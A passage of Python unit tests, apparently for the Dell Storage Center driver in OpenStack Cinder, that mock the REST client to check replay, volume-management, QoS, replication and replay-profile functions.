'get',
return_value=RESPONSE_400)
def test_find_sc_cg_fail(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_sc_cg(
{},
'GUID1-0869559e-6881-454e-ba18-15c6726d33c1')
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_sc_cg',
return_value={'instanceId': 101})
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_find_cg_replays(self,
mock_get,
mock_get_json,
mock_find_sc_cg,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'instanceId': '100'}
replayid = 'Cinder Test Replay012345678910'
res = self.scapi._find_cg_replays(profile, replayid)
expected_url = 'StorageCenter/ScReplayConsistencyGroup/101/ReplayList'
mock_get.assert_called_once_with(expected_url)
self.assertTrue(mock_find_sc_cg.called)
self.assertTrue(mock_get_json.called)
        # We should find RPLAYS.
self.assertEqual(self.RPLAYS, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_sc_cg',
return_value=None)
def test_find_cg_replays_no_cg(self,
mock_find_sc_cg,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'instanceId': '100'}
replayid = 'Cinder Test Replay012345678910'
res = self.scapi._find_cg_replays(profile, replayid)
self.assertTrue(mock_find_sc_cg.called)
# We should return an empty list.
self.assertEqual([], res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_sc_cg',
return_value={'instanceId': 101})
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_find_cg_replays_bad_json(self,
mock_get,
mock_get_json,
mock_find_sc_cg,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'instanceId': '100'}
replayid = 'Cinder Test Replay012345678910'
res = self.scapi._find_cg_replays(profile, replayid)
expected_url = 'StorageCenter/ScReplayConsistencyGroup/101/ReplayList'
mock_get.assert_called_once_with(expected_url)
self.assertTrue(mock_find_sc_cg.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_cg_replays',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_delete_cg_replay(self,
mock_post,
mock_find_cg_replays,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.delete_cg_replay({}, '')
expected_url = ('StorageCenter/ScReplay/' +
self.RPLAYS[0]['instanceId'] +
'/Expire')
mock_post.assert_any_call(expected_url, {}, True)
expected_url = ('StorageCenter/ScReplay/' +
self.RPLAYS[1]['instanceId'] +
'/Expire')
mock_post.assert_any_call(expected_url, {}, True)
self.assertTrue(mock_find_cg_replays.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_cg_replays',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_delete_cg_replay_error(self,
mock_post,
mock_find_cg_replays,
mock_close_connection,
mock_open_connection,
mock_init):
expected_url = ('StorageCenter/ScReplay/' +
self.RPLAYS[0]['instanceId'] +
'/Expire')
res = self.scapi.delete_cg_replay({}, '')
mock_post.assert_called_once_with(expected_url, {}, True)
self.assertTrue(mock_find_cg_replays.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_cg_replays',
return_value=[])
def test_delete_cg_replay_cant_find(self,
mock_find_cg_replays,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.delete_cg_replay({}, '')
self.assertTrue(mock_find_cg_replays.called)
self.assertTrue(res)
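    # Background for the size conversion below: Storage Center reports sizes
    # as strings such as '1.073741824E9 Bytes'.  1073741824 bytes is exactly
    # 1 GiB (2 ** 30), so that value converts to (1, 0); adding 100 bytes
    # leaves a remainder of 100, and a non-numeric string raises.  A rough,
    # hypothetical sketch of the conversion (not the driver's actual code):
    #     gb, rem = divmod(int(float('1.073741824E9')), 2 ** 30)  # -> (1, 0)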
def test_size_to_gb(self,
mock_close_connection,
mock_open_connection,
mock_init):
gb, rem = self.scapi.size_to_gb('1.073741824E9 Byte')
self.assertEqual(1, gb)
self.assertEqual(0, rem)
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.size_to_gb,
'banana')
gb, rem = self.scapi.size_to_gb('1.073741924E9 Byte')
self.assertEqual(1, gb)
self.assertEqual(100, rem)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
def test_import_one(self,
mock_get_json,
mock_put,
mock_find_volume_folder,
mock_close_connection,
mock_open_connection,
mock_init):
newname = 'guid'
        # First test is folder found. Second test is not found.
mock_find_volume_folder.side_effect = [{'instanceId': '1'}, None]
expected_url = 'StorageCenter/ScVolume/100'
expected_payload = {'Name': newname,
'VolumeFolder': '1'}
self.scapi._import_one({'instanceId': '100'}, newname)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(mock_find_volume_folder.called)
expected_payload = {'Name': newname}
self.scapi._import_one({'instanceId': '100'}, newname)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=VOLUME)
def test_manage_existing(self,
mock_import_one,
mock_find_mappings,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.scapi.manage_existing(newname, existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'), None, False)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[])
def test_manage_existing_vol_not_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
        # The volume list comes back empty, so the volume is not found.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{}, {}, {}])
def test_manage_existing_vol_multiple_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
        # More than one volume matches, so the reference is ambiguous.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741924E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 100))
def test_manage_existing_bad_size(self,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
        # The reported size does not convert to a whole number of GB.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[{}, {}])
def test_manage_existing_already_mapped(self,
mock_find_mappings,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=None)
def test_manage_existing_import_fail(self,
mock_import_one,
mock_find_mappings,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# We fail on the _find_volume_folder to make this easier.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
def test_get_unmanaged_volume_size(self,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
res = self.scapi.get_unmanaged_volume_size(existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_size_to_gb.called)
self.assertEqual(1, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[])
def test_get_unmanaged_volume_size_not_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.get_unmanaged_volume_size,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{}, {}, {}])
def test_get_unmanaged_volume_size_many_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.get_unmanaged_volume_size,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741924E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 100))
def test_get_unmanaged_volume_size_bad_size(self,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.get_unmanaged_volume_size,
existing)
self.assertTrue(mock_size_to_gb.called)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_unmanage(self,
mock_get_id,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
        # Unmanage renames the volume with an 'Unmanaged_' prefix.
scvolume = {'name': 'guid'}
expected_url = 'StorageCenter/ScVolume/100'
newname = 'Unmanaged_' + scvolume['name']
expected_payload = {'Name': newname}
self.scapi.unmanage(scvolume)
self.assertTrue(mock_get_id.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_unmanage_fail(self,
mock_get_id,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
        # The rename PUT fails, so unmanage raises.
scvolume = {'name': 'guid'}
expected_url = 'StorageCenter/ScVolume/100'
newname = 'Unmanaged_' + scvolume['name']
expected_payload = {'Name': newname}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.unmanage,
scvolume)
self.assertTrue(mock_get_id.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
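    # The _find_qos tests below exercise a find-or-create pattern: the first
    # POST searches for an existing 'Cinder QoS' node, and only if that
    # search returns an empty list does a second POST create one.  The
    # side_effect lists in these tests line up with that two-step sequence.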
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[SCQOS])
# def _find_qos(self, qosnode):
def test__find_qos(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi._find_qos('Cinder QoS')
self.assertDictEqual(self.SCQOS, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
# def _find_qos(self, qosnode):
def test__find_qos_not_found(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
        # Set side effects for _get_json:
        # first call returns empty, second returns the qosnode.
mock_get_json.side_effect = [[], self.SCQOS]
ret = self.scapi._find_qos('Cinder QoS')
self.assertDictEqual(self.SCQOS, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
# def _find_qos(self, qosnode):
def test__find_qos_find_fail(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_qos,
'Cinder QoS')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
# def _find_qos(self, qosnode):
def test__find_qos_create_fail(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
mock_post.side_effect = [self.RESPONSE_200, self.RESPONSE_400]
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_qos,
'Cinder QoS')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL)
def test_get_screplication(self,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.get_screplication({'instanceId': '1'}, 65495)
self.assertDictEqual(self.SCREPL[0], ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
def test_get_screplication_not_found(self,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.get_screplication({'instanceId': '1'}, 65496)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_screplication_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.get_screplication({'instanceId': '1'}, 65495)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication',
return_value=SCREPL[0])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_replication(self,
mock_delete,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
destssn = 65495
expected = 'StorageCenter/ScReplication/%s' % (
self.SCREPL[0]['instanceId'])
expected_payload = {'DeleteDestinationVolume': True,
'RecycleDestinationVolume': False,
'DeleteRestorePoint': True}
ret = self.scapi.delete_replication(self.VOLUME, destssn)
mock_delete.assert_any_call(expected, payload=expected_payload,
async=True)
self.assertTrue(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication',
return_value=None)
def test_delete_replication_not_found(self,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
destssn = 65495
ret = self.scapi.delete_replication(self.VOLUME, destssn)
self.assertFalse(ret)
ret = self.scapi.delete_replication(self.VOLUME, destssn)
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication',
return_value=SCREPL[0])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_400)
def test_delete_replication_error(self,
mock_delete,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
destssn = 65495
expected = 'StorageCenter/ScReplication/%s' % (
self.SCREPL[0]['instanceId'])
expected_payload = {'DeleteDestinationVolume': True,
'RecycleDestinationVolume': False,
'DeleteRestorePoint': True}
ret = self.scapi.delete_replication(self.VOLUME, destssn)
mock_delete.assert_any_call(expected, payload=expected_payload,
async=True)
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_qos',
return_value=SCQOS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_sc')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL[0])
def test_create_replication(self,
mock_get_json,
mock_post,
mock_find_sc,
mock_find_qos,
mock_close_connection,
mock_open_connection,
mock_init):
# We don't test diskfolder. If one is found we include it. If not
# then we leave it out. Checking for disk folder is tested elsewhere.
ssn = 64702
destssn = 65495
qosnode = 'Cinder QoS'
notes = 'Created by Dell Cinder Driver'
repl_prefix = 'Cinder repl of '
mock_find_sc.side_effect = [destssn, ssn, destssn, ssn, destssn, ssn]
payload = {'DestinationStorageCenter': destssn,
'QosNode': self.SCQOS['instanceId'],
'SourceVolume': self.VOLUME['instanceId'],
'StorageCenter': ssn,
'ReplicateActiveReplay': False,
'Type': 'Asynchronous',
'DestinationVolumeAttributes':
{'CreateSourceVolumeFolderPath': True,
'Notes': notes,
'Name': repl_prefix + self.VOLUME['name']}
}
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
False,
None,
False)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertDictEqual(self.SCREPL[0], ret)
payload['Type'] = 'Synchronous'
payload['ReplicateActiveReplay'] = True
payload['SyncMode'] = 'HighAvailability'
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
True,
None,
False)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertDictEqual(self.SCREPL[0], ret)
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
True,
None,
True)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertDictEqual(self.SCREPL[0], ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_qos',
return_value=SCQOS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_sc')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL[0])
def test_create_replication_error(self,
mock_get_json,
mock_post,
mock_find_sc,
mock_find_qos,
mock_close_connection,
mock_open_connection,
mock_init):
ssn = 64702
destssn = 65495
qosnode = 'Cinder QoS'
notes = 'Created by Dell Cinder Driver'
repl_prefix = 'Cinder repl of '
mock_find_sc.side_effect = [destssn, ssn, destssn, ssn]
mock_post.side_effect = [self.RESPONSE_400, self.RESPONSE_400,
self.RESPONSE_400, self.RESPONSE_400]
payload = {'DestinationStorageCenter': destssn,
'QosNode': self.SCQOS['instanceId'],
'SourceVolume': self.VOLUME['instanceId'],
'StorageCenter': ssn,
'ReplicateActiveReplay': False,
'Type': 'Asynchronous',
'DestinationVolumeAttributes':
{'CreateSourceVolumeFolderPath': True,
'Notes': notes,
'Name': repl_prefix + self.VOLUME['name']}
}
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
False,
None,
False)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertIsNone(ret)
payload['Type'] = 'Synchronous'
payload['ReplicateActiveReplay'] = True
payload['SyncMode'] = 'HighAvailability'
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
True,
None,
True)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL)
def test_find_repl_volume(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertDictEqual(self.SCREPL[0], ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
def test_find_repl_volume_empty_list(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[{'instanceId': '1'}, {'instanceId': '2'}])
def test_find_repl_volume_multiple_results(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_find_repl_volume_error(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertIsNone(ret)
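    # test_break_replication below runs four scenarios through one test
    # body.  Each call to break_replication consumes the next value from
    # every side_effect list, and the inline '# 1' .. '# 4' markers show
    # which scenario each canned value belongs to.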
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_repl_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'remove_mappings')
def test_break_replication(self,
mock_remove_mappings,
mock_find_volume,
mock_find_repl_volume,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
# Find_volume doesn't actually matter. We do not gate on this.
# Switch it up just to prove that.
mock_find_volume.side_effect = [self.VOLUME, # 1
self.VOLUME, # 2
None, # 3
None] # 4
# Much like find volume we do not gate on this.
mock_get_screplication.side_effect = [self.SCREPL[0], # 1
None, # 2
None, # 3
None] # 4
        # This is the volume break_replication returns.
mock_find_repl_volume.side_effect = [self.VOLUME, # 1
self.VOLUME, # 2
self.VOLUME, # 3
self.VOLUME] # 4
mock_remove_mappings.side_effect = [True, # 1
True,
True, # 2
False,
True, # 3
True,
False] # 4
# Good path.
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
# Source found, screpl not found.
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
# No source vol good path.
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
# fail remove mappings
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences')
def test__find_user_replay_profiles(self,
mock_get_user_preferences,
mock_close_connection,
mock_open_connection,
mock_init):
mock_get_user_preferences.return_value = {}
ret = self.scapi._find_user_replay_profiles()
self.assertEqual([], ret)
mock_get_user_preferences.return_value = {'test': 'test',
'replayProfileList': []}
ret = self.scapi._find_user_replay_profiles()
self.assertEqual([], ret)
mock_get_user_preferences.return_value = {
'test': 'test', 'replayProfileList': [{'instanceId': 'a'},
{'instanceId': 'b'}]}
ret = self.scapi._find_user_replay_profiles()
self.assertEqual(['a', 'b'], ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
def test__find_daily_replay_profile(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = [{'instanceId': 'a'}]
ret = self.scapi._find_daily_replay_profile()
self.assertEqual('a', ret)
mock_get_json.return_value = []
ret = self.scapi._find_daily_replay_profile()
self.assertIsNone(ret)
mock_get_json.return_value = None
ret = self.scapi._find_daily_replay_profile()
self.assertIsNone(ret)
mock_post.return_value = self.RESPONSE_400
ret = self.scapi._find_daily_replay_profile()
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
def test__find_replay_profiles(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Good run.
rps = 'a,b'
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = [{'name': 'a', 'instanceId': 'a'},
{'name': 'b', 'instanceId': 'b'},
{'name': 'c', 'instanceId': 'c'}]
reta, retb = self.scapi._find_replay_profiles(rps)
self.assertEqual(['a', 'b'], reta)
self.assertEqual(['c'], retb)
# Looking for profile that doesn't exist.
rps = 'a,b,d'
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_replay_profiles,
rps)
# Looking for nothing.
rps = ''
reta, retb = self.scapi._find_replay_profiles(rps)
self.assertEqual([], reta)
self.assertEqual([], retb)
# Still Looking for nothing.
rps = None
reta, retb = self.scapi._find_replay_profiles(rps)
self.assertEqual([], reta)
self.assertEqual([], retb)
# Bad call.
rps = 'a,b'
mock_post.return_value = self.RESPONSE_400
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_replay_profiles,
rps)
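    # test_update_replay_profiles below also chains several scenarios in one
    # body: the long side_effect list on _update_volume_profiles is consumed
    # across all of the update_replay_profiles calls, and the inline comments
    # track the cumulative call_count expected after each call.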
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_replay_profiles')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_user_replay_profiles')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_daily_replay_profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles')
def test_update_replay_profiles(self,
mock_update_volume_profiles,
mock_find_daily_replay_profile,
mock_find_user_replay_profiles,
mock_find_replay_profiles,
mock_close_connection,
mock_open_connection,
mock_init):
scvol = {}
mock_find_replay_profiles.return_value = (['a', 'b'], ['c'])
mock_update_volume_profiles.side_effect = [
True, True, True,
False,
True, True, False,
True, True, True, True, True,
True, True, True, True,
False]
ret = self.scapi.update_replay_profiles(scvol, 'a,b')
# Two adds and one remove
self.assertEqual(3, mock_update_volume_profiles.call_count)
self.assertTrue(ret)
# Now update fails.
ret = self.scapi.update_replay_profiles(scvol, 'a,b')
# 1 failed update plus 3 from before.
self.assertEqual(4, mock_update_volume_profiles.call_count)
self.assertFalse(ret)
        # Fail adding IDs.
ret = self.scapi.update_replay_profiles(scvol, 'a,b')
        # 3 more plus 4 from before.
self.assertEqual(7, mock_update_volume_profiles.call_count)
self.assertFalse(ret)
# User clearing profiles.
mock_find_replay_profiles.return_value = ([], ['a', 'b', 'c'])
mock_find_user_replay_profiles.return_value = ['d', 'u']
ret = self.scapi.update_replay_profiles(scvol, '')
# 3 removes and 2 adds plus 7 from before
self.assertEqual(12, mock_update_volume_profiles.call_count)
self.assertTrue(ret)
# User clearing profiles and no defaults. (Probably not possible.)
mock_find_user_replay_profiles.return_value = []
mock_find_daily_replay_profile.return_value = 'd'
ret = self.scapi.update_replay_profiles(scvol, '')
# 3 removes and 1 add plus 12 from before.
self.assertEqual(16, mock_update_volume_profiles.call_count)
self.assertTrue(ret)
# _find_replay_profiles blows up so we do too.
mock_find_replay_profiles.side_effect = (
exception.VolumeBackendAPIException('aaa'))
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.update_replay_profiles,
scvol,
'a,b')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put')
def test_manage_replay(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
screplay = {'description': 'notguid',
'instanceId': 1}
payload = {'description': 'guid',
'expireTime': 0}
mock_put.return_value = self.RESPONSE_200
ret = self.scapi.manage_replay(screplay, 'guid')
self.assertTrue(ret)
mock_put.assert_called_once_with('StorageCenter/ScReplay/1', payload,
True)
mock_put.return_value = self.RESPONSE_400
ret = self.scapi.manage_replay(screplay, 'guid')
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put')
def test_unmanage_replay(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
screplay = {'description': 'guid',
'instanceId': 1}
payload = {'expireTime': 1440}
mock_put.return_value = self.RESPONSE_200
ret = self.scapi.unmanage_replay(screplay)
self.assertTrue(ret)
mock_put.assert_called_once_with('StorageCenter/ScReplay/1', payload,
True)
mock_put.return_value = self.RESPONSE_400
ret = self.scapi.unmanage_replay(screplay)
